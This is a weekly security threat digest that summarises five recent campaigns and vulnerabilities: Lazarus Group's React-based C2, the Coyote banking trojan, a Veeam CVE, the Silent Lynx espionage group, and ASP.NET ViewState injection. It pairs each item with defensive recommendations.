North Korean Hackers Exploits React-Powered C2 Infrastructure for Global Attacks

In the past week, critical cybersecurity threats have emerged, with significant vulnerabilities being reported across various platforms. Recent cybersecurity incidents highlight the growing sophistication of threat actors, including North Korea’s Lazarus Group, which exploits a React-powered command-and-control (C2) infrastructure to target cryptocurrency developers via LinkedIn job scams and trojanized software packages. Another major attack, the Coyote Banking Trojan, is using LNK files and PowerShell scripts to infiltrate banking applications, steal credentials, and evade detection through registry modifications. Meanwhile, Veeam has patched a critical vulnerability (CVE-2025-23114) that enables Man-in-the-Middle (MitM) attacks, allowing arbitrary code execution on backup infrastructure. Additionally, Silent Lynx, a sophisticated cyber-espionage group, has been targeting financial and government institutions in Central Asia using multi-stage malware, Telegram bots, and Golang payloads for remote access and data exfiltration. Lastly, Microsoft has warned about ViewState code injection attacks exploiting publicly exposed ASP.NET machine keys, leading to remote code execution (RCE) on IIS servers. These developments underscore the urgent need for organizations to stay vigilant and apply security updates promptly.

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

1. North Korean Hackers Exploit React-Powered C2 Infrastructure for Global Attacks

The Lazarus Group, a North Korean state-sponsored threat actor, has been using a React-based web platform to manage its command-and-control (C2) infrastructure, facilitating payload management, data exfiltration, and victim oversight. Operation Phantom Circuit specifically targets cryptocurrency developers and authentication solutions through trojanized software packages, tricking developers via LinkedIn job scams that lead them to execute malicious code on corporate devices. The campaign, active from September 2024 to January 2025, compromised 1,639 victims, with India, Brazil, and France being the most affected. Attackers employ software supply chain attacks, injecting obfuscated backdoors into cryptocurrency and authentication software, alongside social engineering tactics, where fake recruiters distribute malware-laced job tests. Their C2 infrastructure, hosted on Stark Industries servers, is obscured through Astrill VPN and Oculus Proxy, communicating via ports 1224 and 1245. To mitigate risks, organizations should implement cryptographic checksums and audit third-party dependencies, while monitoring uncommon ports and VPN usage for anomalies. Security teams should investigate prolonged RDP sessions, conduct security audits on development tools, and educate developers about social engineering threats on LinkedIn, enforcing strict policies against executing external scripts in recruitment tests.

2. New Coyote Banking Trojan Campaign Exploits LNK Files for Infection

The Coyote Banking Trojan is deploying LNK files that execute PowerShell commands to connect to remote servers, targeting Brazilian users and aiming to steal banking credentials from over 70 financial applications and various websites. This multi-stage attack utilizes keylogging, phishing overlays, and screenshot capture to exfiltrate data while maintaining persistence via Windows registry modifications. The Trojan evades detection by checking for virtual environments and sandbox analysis before executing and communicates with command-and-control (C2) servers for continuous data theft. The attack initiates through malicious LNK files containing PowerShell scripts that download payloads, enabling multi-stage execution via DLL injection and Donut shellcode. To mitigate risks, organizations should disable LNK file execution from untrusted sources, restrict PowerShell policies, and monitor suspicious script activities. Security teams must implement behavior-based threat detection, block malicious domains, restrict outbound traffic, and educate users on LNK file risks, reinforcing endpoint security and email filtering mechanisms.

3. Critical Security Flaw in Veeam Backup Software Allows Arbitrary Code Execution

Veeam has patched a critical vulnerability (CVE-2025-23114, CVSS 9.0) in its Backup software that could allow attackers to execute arbitrary code via a Man-in-the-Middle (MitM) attack. The flaw affects multiple products, including Veeam Backup for Salesforce, Nutanix AHV, AWS, Azure, and Google Cloud, posing a risk of data breaches, unauthorized access, and system takeover. The issue originates from the Veeam Updater component, which could grant attackers root-level permissions on compromised servers. Organizations using affected versions should immediately update to the latest patched releases to mitigate risks. To enhance security, organizations must verify network security controls, restrict access to Veeam Backup servers, and ensure secure communication channels. Regular monitoring of backup infrastructure for suspicious activity, auditing Veeam deployments, and configuring firewalls and intrusion detection systems are crucial steps to prevent exploitation and maintain compliance with security best practices.

4. A Sophisticated Cyber-Espionage Group Leveraging PowerShell, Golang, and C++

Silent Lynx, a previously unknown threat actor, has been targeting government-backed banks, embassies, think tanks, and legal entities in Kyrgyzstan, Turkmenistan, and potentially Kazakhstan, focusing on economic and financial institutions. Their spear-phishing campaigns use malicious RAR archives to deploy multi-stage malware, including ISO files, PowerShell scripts, C++ binaries, and Golang payloads, while leveraging Telegram bots for command execution and data exfiltration. The group’s tactics mirror YoroTrooper, a known CIS-focused espionage group, indicating possible links or shared methodologies. Silent Lynx’s malware delivers decoy documents and multi-stage execution chains to maintain stealth and persistence, often establishing reverse shells for remote access. Organizations should deploy advanced email filtering, restrict ISO file execution, and monitor PowerShell activity, while implementing least privilege access, sandboxing solutions, and behavior-based endpoint detection to counteract evolving threats. Security teams must investigate abnormal Telegram bot connections and track Silent Lynx’s tactics via threat intelligence.

5. Microsoft Warns of ASP.NET Machine Key Exposure

Microsoft has warned of a critical security risk where developers unknowingly use publicly disclosed ASP.NET machine keys, enabling ViewState code injection attacks and the deployment of the Godzilla post-exploitation framework. Over 3,000 exposed machine keys have been identified, allowing attackers to achieve remote code execution (RCE) on IIS servers. Unlike previous ViewState injection attacks relying on stolen keys sold on dark web forums, these keys were freely available in public repositories, making them more accessible to attackers. ViewState, an ASP.NET feature for maintaining page state, relies on a machine authentication code (MAC) key; if compromised, attackers can inject malicious ViewState payloads that the ASP.NET runtime decrypts and executes, leading to system takeover. To mitigate risks, organizations must avoid using publicly available machine keys, regularly rotate keys, verify integrity against Microsoft’s provided hashes, enforce secure coding practices, monitor IIS activity for anomalies, and implement Web Application Firewalls (WAFs) to block malicious payloads.